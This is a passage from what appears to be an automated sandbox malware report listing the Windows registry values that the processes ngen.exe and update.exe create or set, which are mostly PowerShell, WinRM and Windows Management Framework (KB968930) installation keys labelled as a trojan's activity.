[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
The process ngen.exe:2512 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A FA DF 1F C5 C4 08 79 BE CF C8 D1 CA D1 75 75"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process update.exe:2828 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"
[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"ControlFlags" = "1"
[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"
[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"PathInetsrv" = "%System%\inetsrv"
[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"
[HKCR\.ps1xml]
"PerceivedType" = "Text"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"
[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"CoInitializeSecurityParam" = "1"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell]
"Path" = "%System%\WindowsPowerShell\v1.0\powershell.exe"
[HKCR\Microsoft.PowerShellConsole.1]
"FriendlyTypeName" = "Windows PowerShell Console File"
[HKCR\Microsoft.PowerShellModule.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"
[HKCR\WSMan.InternalAutomation]
"(Default)" = "WSMan InternalAutomation Class"
[HKCR\Microsoft.PowerShellData.1]
"FriendlyTypeName" = "Windows PowerShell Data File"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"(Default)" = "%System%\wsmprovhost.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"PathScripts" = "C:\Inetpub\iissamples\Scripts"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0]
"(Default)" = "Microsoft WSMAN Automation V1.0 Library"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost\WINRM]
"AuthenticationCapabilities" = "12320"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"Version" = "1.0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"Retention" = "0"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"EventMessageFile" = "%SystemRoot%\System32\spmsg.dll"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "PSFactoryBuffer"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PublishingGroup" = "Management and Infrastructure Group"
[HKCR\Microsoft.PowerShellConsole.1\shell\open\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -p %1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Retention" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsPutSignature"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"ParameterMessageFile" = "%systemroot%\system32\kernel32.dll"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\NumMethods]
"(Default)" = "6"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnService" = "RPCSS, HTTP, HTTPFilter"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"TypesSupported" = "7"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}]
"(Default)" = "IWSManEx"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"TSAware" = "1"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"(Default)" = "Microsoft Windows Remote Shell Host"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"UninstallCommand" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostModuleName" = "%System%\WindowsPowerShell\v1.0\Microsoft.PowerShell.ConsoleHost.dll"
[HKCR\WSMan.Automation\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"
[HKCR\WSMan.Automation.1\CLSID]
"(Default)" = "{BCED617B-EC03-420b-8508-977DC7A686BD}"
[HKLM\System\CurrentControlSet\Services\WinRM]
"Type" = "32"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\VersionIndependentProgID]
"(Default)" = "WSMan.Automation"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"UpgradeType" = "0"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DisplayName" = "Windows Remote Management (WS-Management)"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"BitNames" = " rsError rsWarning rsTrace rsNone"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\0\win32]
"(Default)" = "%System%\WsmAuto.dll"
[HKCR\Microsoft.PowerShellConsole.1]
"EditFlags" = "131072"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"PathFTPRoot" = "C:\Inetpub\ftproot"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledDate" = "6/27/2016"
"ReleaseType" = "Software Update"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\WSMan.InternalAutomation.1\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"
[HKCR\WSMan.Automation\CurVer]
"(Default)" = "WSMan.Automation.1"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\ProgID]
"(Default)" = "WSMan.InternalAutomation.1"
[HKCR\.ps1xml]
"(Default)" = "Microsoft.PowerShellXmlData.1"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 5D 3B F8 58 A0 4B 7B 52 FE 41 83 6D F6 7D 89"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"
[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"
[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"
[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"PathWWWRoot" = "C:\Inetpub\wwwroot"
[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"
[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"IISProgramGroup" = "Microsoft Internet Information Services"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledBy" = "%CurrentUserName%"
[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\.psc1]
"Content Type" = "application/PowerShell"
[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"
[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"
[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"
[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"
[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"
[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"
[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"
[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20160627"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"
[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"
[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"
[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"
[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"PathIISAdmin" = "%System%\inetsrv\iisadmin"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."
[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"
[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"
[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Type" = "Update"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"
[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"
[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"PathIISHelp" = "%WinDir%\Help\iishelp"
[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
"PathIISSamples" = "C:\Inetpub\iissamples"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
